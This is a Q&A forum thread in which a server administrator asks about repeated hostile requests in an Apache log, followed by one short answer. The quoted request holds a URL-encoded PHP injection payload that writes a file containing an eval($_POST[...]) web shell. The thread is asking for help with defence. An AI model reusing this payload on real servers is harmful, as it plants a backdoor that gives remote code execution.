0

We are continuously receiving following requests on our apache server from the hackers

?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);
@set_magic_quotes_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php%20eval($_POST%5Bshine%5D);?%3E');echo%20'%7C%3C-'; HTTP/1.1 200 42673

Please help us to let me know which kind of hacking attempt is this? there are no cache.php on the server still the hacker is getting 200 HTTP Response.

there are around 200 requests like this. is this attack will cause severe security threat on the server?

It would be great if anyone explains to me the meaning of PHP function used in above request.

Pawan Patil
  • 397
  • 3
  • 11

1 Answers1

1

This is trying to reset some of the PHP init functions. Mainly activating on screen errors, turning off magic quotes (helps with SQLI), and writing a file.

They are getting a 200 resp as this is just a query string, i.e this could be any url with this query appended.

It will most likely just be a scanner looking for vulnerabilities. You could take action to block there IP, User agent etc.

TrickyDupes
  • 2,829
  • 1
  • 13
  • 27